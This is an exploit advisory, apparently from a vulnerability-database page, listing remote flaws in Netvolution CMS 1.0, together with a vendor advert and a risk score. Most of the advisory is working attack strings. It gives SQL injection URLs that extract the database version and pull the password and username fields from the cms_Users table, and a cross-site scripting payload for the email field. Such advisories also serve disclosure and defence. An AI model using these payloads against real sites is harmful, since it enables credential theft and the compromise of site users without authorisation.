Lucene search
Netvolution CMS 1.0 (XSS/SQL) Multiple Remote Vulnerabilities
Netvolution CMS 1.0 Remote Vulnerabilities Foun
Show more
=============================================================
Netvolution CMS 1.0 (XSS/SQL) Multiple Remote Vulnerabilities
=============================================================
###############################################
Found By : Ellinas aka Greek
Vulnerable Product: CMS netvolution v1.0
##############################################
SQL Injection
Version Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=100%20AND%20SUBSTRING(@@version,1,130)=5
Password Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20AND%20
(select%20(substring(userPassword,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608
Username Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20
AND%20(select%20(substring(userName,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608
Cross Site Scripting
Set the variable email to >"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>
************************
# 0day.today [2018-04-01] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo14 Jan 2009 00:00Current
7.1High risk
Vulners AI Score7.1